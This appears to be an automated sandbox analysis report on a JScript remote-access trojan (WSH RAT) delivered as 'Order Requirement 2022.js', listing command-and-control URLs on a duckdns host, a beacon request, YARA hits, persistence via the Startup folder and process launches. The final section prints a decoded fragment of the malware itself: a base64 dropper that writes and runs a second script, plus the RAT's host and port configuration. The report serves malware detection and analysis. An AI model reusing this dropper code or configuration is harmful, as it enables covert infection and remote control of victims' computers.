Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/1
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/O?
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/ilter-0000
Source: wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/on
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.876023477.000001B9F39A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893517385.000001B9F4442000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818184193.000001B9F19C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525722834.000001B9F39A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready
Source: wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready#X5
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.886964153.0000025291B72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready&
Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready-
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready.
Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready3
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready32
Source: wscript.exe, 00000002.00000003.401463583.0000025291BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready?
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyAN
Source: wscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyD
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyEM
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyG
Source: wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyI
Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyK
Source: wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyL
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyT
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyXFwuXFxyb290XFxjaW12MiIpOw0KdmFy
Source: wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready_
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyady
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyady.
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyadyEM
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyas
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyckdns.org:2022/is-ready
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyd8
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readye
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyed.
Source: wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyh8
Source: wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readym32
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readymFtZS5zcGxpdCgiLiIpWzBdLC
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readys.org:2022/is-ready
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readys.org:2022/is-readypData
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readysL8
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyspecified
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyt
Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:20ecuritycenter2=
Source: wscript.exe, 00000001.00000003.378593227.00000228B31F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com=
Source: wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZZZZ
Source: unknown HTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScriptAccept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: jbd231.duckdns.org:2022Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: javaautorun.duia.ro

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR

System Summary

barindex
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: Order Requirement 2022.js Initial sample: Suspicious string keylogger A2V5BG9NZ2VY
Source: Order Requirement 2022.js Initial sample: Suspicious string spreading C3BYZWFKAW5N
Source: Order Requirement 2022.js Initial sample: Suspicious string .write LNDYAXRL
Source: Order Requirement 2022.js Initial sample: Suspicious string %comspec% JWNVBXNWZWML
Source: Order Requirement 2022.js Initial sample: Suspicious string win32_ D2LUMZJF
Source: Order Requirement 2022.js Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Requirement 2022.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winJS@20/6@14/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj 